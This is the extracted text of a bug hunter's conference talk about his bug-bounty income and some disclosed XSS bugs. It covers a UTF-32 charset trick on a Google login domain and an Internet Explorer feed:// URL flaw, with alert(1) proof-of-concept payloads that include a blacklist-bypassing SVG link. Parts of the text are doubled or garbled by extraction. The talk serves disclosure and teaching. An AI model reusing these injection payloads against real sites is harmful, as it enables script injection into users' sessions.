BBuugg--hhuunntteerr’’ss JJooyy

Masato  Kinugawa  

Name Masato Kinugawa Nationality Japanese(maybe)

Hobby Listening Music and XSS Profession BBuugg--hhuunntteerr

FFiirrsstt BBuugg--HHuunntteerr’’ss LLiiffee aanndd BBoouunnttyy PPrrooggrraamm

SSeeccoonndd DDeelliigghhttffuull BBuuggss

TThhiirrdd TThhee rreeaassoonnss wwhhyy II bbeeccaammee BBuugg--hhuunntteerr

BBuugg--hhuunntteerr’’ss LLiiffee aanndd BBoouunnttyy PPrrooggrraamm

Workplace Home Working Hours Any time I want

Work Finding Security Bugs Income BBuugg BBoouunnttyy

➡Does it make enough money to live?

2277113355334466 ((JJPPYY)) $$114422772233 (($$11 == 112200 JJPPYY))

2277113355334466 ((JJPPYY)) $$114422772233 (($$11 == 112200 JJPPYY)) ((iinn OOccttaall ddiiggiittss))

! GGooooggllee launched in 2010 ! Followed by MMaannyy CCoommppaanniieess

! GGooooggllee VVulnerability RReward PProgram ! 1 bug = $100~20,000

$$113300,,880033..77 TToottaall BBoouunnttiieess

NNuummbbeerr ooff bbuuggss rreeppoorrtteedd

112277((119911 including duplicated and/or not rewarded ones)

EEvveenn mmoorree mmoottiivvaatteedd bbyy tthhee iinnccrreeaasseedd bboouunnttyy rraatteess!! $  

II aamm aaccttuuaallllyy nniigghhtt oowwll……

! QQuuiicckk RReeppoossee since the program is launched.

! CCoonnssiiddeerr NOT ONLY seriousness, but also tthhee lleevveell ooff ““iinntteerreessttiinngg””,, ooff tthhee bbuugg..

! Require only ssiimmppllee eexxppllaannaattiioonn ttoo hhaavvee tthheemm uunnddeerrssttaanndd tthhee pprroobblleemm..

! PPrroovviiddee ffuunn to the reporters.

! TThhee MMoosstt IImmppoorrttaanntt DDoommaaiinn ooff GGooooggllee ! Bounty was $$55,,000000 (Exceeds the regulated maximum

amount at that time)

https://accounts.google.com/example?oe=utf-‐‑‒32  

HTTP/1.1  200  OK  Alternate-‐‑‒Protocol:  443:quic,p=0.01  Cache-‐‑‒Control:  private,  max-‐‑‒age=0  Content-‐‑‒Encoding:  gzip  Content-‐‑‒Type:  text/html;  charset=UTF-‐‑‒32  ...  

! Character Code can be set by URL ! UUTTFF--3322 was able to be set

∀㸀㸀㰀㰀script㸀㸀alert(1)㰀㰀/script㸀㸀�

➊➊ AArrrraayy ooff tthhee BByytteess

❷❷ CChhaarraacctteerr CCooddee ooff tthhee PPaaggee

❸❸ HHaannddlliinngg 00xx0000 CChhaarraacctteerrss

00  00  22  00  00  00  3E  00  00  00  3C  00  00  00  00  73  00  00  00  63  00  00  00  72  00  00  00  69  00  00  00  70  00  00  00  74  00  00  3E  00  00  00  00  61  00  00  00  6C  00  00  00  65  00  00  00  72  00  00  00  74  00  00  00  28  00  00  00  31  00  00  00  29  00  00  3C  00  00  00  00  2F  00  00  00  73  00  00  00  63  00  00  00  72  00  00  00  69  00  00  00  70  00  00  00  74  00  00  3E  00  

∀㸀㸀㰀㰀�s  c    r�i    p    t�㸀㸀a    l�e  r    t�(  1    )�㰀㰀/    s�c  r    i�p  t  㸀㸀�

In UTF-32, 1 character requires 4 bytes

➊�

IE  does  not  support  UTF-‐‑‒32    ➡Character  Code  shall  be  “recognized”  to  be  something  

00  00  22  00  00  00  3E  00  00  00  3C  00  00  00  00  73  00  00  00  63  00  00  00  72  00  00  00  69  00  00  00  70  00  00  00  74  00  00  3E  00  00  00  00  61  00  00  00  6C  00  00  00  65  00  00  00  72  00  00  00  74  00  00  00  28  00  00  00  31  00  00  00  29  00  00  3C  00  00  00  00  2F  00  00  00  73  00  00  00  63  00  00  00  72  00  00  00  69  00  00  00  70  00  00  00  74  00  00  3E  00  

∀㸀㸀㰀㰀�s  c    r�i    p    t�㸀㸀a    l�e  r    t�(  1    )�㰀㰀/    s�c  r    i�p  t  㸀㸀�

❷

This “super great” web site provides the support status of character codes, of all web browser http://l0.cm/encodings/table/

IE(<=9) ignores the characters ➡the “00” are uunnddeerrssttoooodd aass nnootthhiinngg..

00  00  22  00  00  00  3E  00  00  00  3C  00  00  00  00  73  00  00  00  63  00  00  00  72  00  00  00  69  00  00  00  70  00  00  00  74  00  00  3E  00  00  00  00  61  00  00  00  6C  00  00  00  65  00  00  00  72  00  00  00  74  00  00  00  28  00  00  00  31  00  00  00  29  00  00  3C  00  00  00  00  2F  00  00  00  73  00  00  00  63  00  00  00  72  00  00  00  69  00  00  00  70  00  00  00  74  00  00  3E  00  

�  >  ��s  c    r�i    p  t�>  a  l�e  r    t�(  1    )��  /  s�c  r    i�p  t  >�

❸

Message from the web page

Seek browser and plug-in bugs also ������1�������������1�������������1�������������1�������������1�������������1����1��������1��1����

������11������������1�������������1�������

������1��1����������1����1��������1���1���������1�������������11������

������11������������1����1��

������1�����1�������1�������������1�������������1����1��������1�������������1�������������1�������������1�������������1�������

! 2288..77%% of total number of bugs I reported ! TThhee 8877%% ooff tthheemm aarree wwiitthh IIEE

! Take longer to fix ! Even if it is fixed, it is NOT likely to applied to

the different IE version.

Something is required at the Web service level

Therefore

location.href is aa mmeetthhoodd ttoo ggeett tthhee UURRLL ooff tthhee ppaaggee by JavaScript

http://example.com/

http://example.com/

location.href

http://evil%2F@eexxaammppllee..ccoomm/ location.href is

http://eevviill/@example.com/ The URL part before @ is aauuttoommaattiiccaallllyy ddeeccooddeedd!! ➡IItt ggeenneerraatteess UURRLL ppooiinnttss ttoo eexxtteerrnnaall WWeebb ssiittee

AAllll ccooddeess iinncclluuddee llooccaattiioonn..hhrreeff ppooiinnttiinngg ttoo sseellff--ddoommaaiinn aarree ppootteennttiiaallllyy vvuullnneerraabbllee

Added characters before “@”, then checked any web pages if it send request to the external sites

Therefore

http://evil%2F@www.youtube.com/  

! Found ffaattaall bbuugg, at same time ! Exist in feed:// URL that represents RSS ! Can extract unrelated feed to any domain

by ccuussttoommiizziinngg the part of URL before @. ! Put the scripts in the unrelated feeds,

XSS works on the extracted domain

WWee ccaann eennffoorrccee XXSSSS oonn aannyy wweebb ssiitteess ＼＼((^̂oo^̂))// yyeeaahh☆☆

therefore

In feed:// URL, characters which can run scripts are restricted. (=Blacklist)

It is easy; jjuusstt ppaassssiinngg tthhrroouugghh tthhee bbllaacckklliisstt!

Things to do

<a href="javascript:alert(1)">XSS</a>

<a>XSS</a>

FFiinndd oouutt tthhee cchhaarraacctteerrss wwhhiicchh ccaann ppaassss tthhrroouugghh bbaasseedd oonn tthhee cchhaarraacctteerr rreemmoovvaall ppaatttteerrnn

BBeeeeppiinngg!!

<svg><a xmlns:xlink="http://www.w3.org/1999/xlink"xxlliinnkk::hhrreeff==""jjaavvaassccrriipptt::aalleerrtt((11))""><rect width="1000" height="1000" /></a></svg> SSiilleennccee……

feed://l0.cm%2Fcb.rss%3F@codeblue.jp/  

feed://l0.cm%2Fcb.rss%3F@codeblue.jp/  

alert('CODE  BLUE、2回⽬目開催おめでとう！\n'+  document.domain+'から')  

(Congratulation  for  the  2nd  Code  Blue)  

! Web applications are in jeopardies caused by character codes, browser behaviors / bugs, and so on…

! Finding out mysteriously complicated bugs is tthhee uullttiimmaattee ddeelliigghhtt..

You want to see more? http://masatokinugawa.l0.cm/

! Grow up in touch of computers.

! Love to disassemble anything

! Debut as XSS “attacker” in the 6th grade

! Grow up with in touch of computers.  ➡  I  got  to  knew  what  is  binary  in  2009  ! Love to disassemble anything    ➡  Donʼ’t  love  to  do  (so  lot)  ! Debut as XSS “attacker” in the 6th grade    ➡  I  got  interested  in  security  in  2009  

Decided to ddoo wwhhaatt II wwaanntt,, iinn mmyy wwaayy

���������������������

～2009 A lot happened 　2010 Left computer vocational school

What  I  want  to  do:  Seeking  vulnerabilities  

FFoouunndd ssoo lloott!!

Soon after, GGooooggllee llaauunncchheedd bug bounty program

Spent all waking hours to find vulnerabilities.

Bug  hunting  house-‐‑‒husband?      ➡  Need  to  gain  girl  hunt  skill  also  ☺  

! Extension  of  what    I  want  to  do  ! Found  my  self  as  bug̶—hunter,  one  day  

WWiisshh ffoorr ffuuttuurree……

! Must spent most of the time to repeating unsophisticated verification test

! No income unless find anything

! FFeeeelliinngg aaccccoommpplliisshhmmeenntt iiss ggrreeaatt, as what I achieved, directly become money

! NNootthhiinngg iinn tthhee wwoorrlldd ttoo ffeeeell ddeelliigghhtt like treasure hunting.

! Abnormal behaviors are mmuucchh ffuunn ttoo sseeee

However…

TThhee ffiinnddiinngg sskkiillll iiss aallll wwhhaatt yyoouu nneeeedd Can concentrate on to improving skill

CCaann ddoo bbyy yyoouurrsseellff Almost no human relationship issue

CCaann ddoo aatt yyoouurr hhoommee No commuting time

CCaann wwoorrkk aatt oowwnn ppaaccee Can do when you want

　“Listen music” as a hobby 　“Bug-hunt” as a hobby (same as above)

““HHoobbbbyy””

Do anything you want! Then, you may find your own way.

FFoorr tthhoossee wwhhoo aarree ttrryyiinngg ttoo ffiinndd yyoouurr wwaayy......

UUnnddeerrssttoooodd??!!

Thank  You!  

@kinugawamasato  

✉   masatokinugawa  [at]  gmail.com  

Contact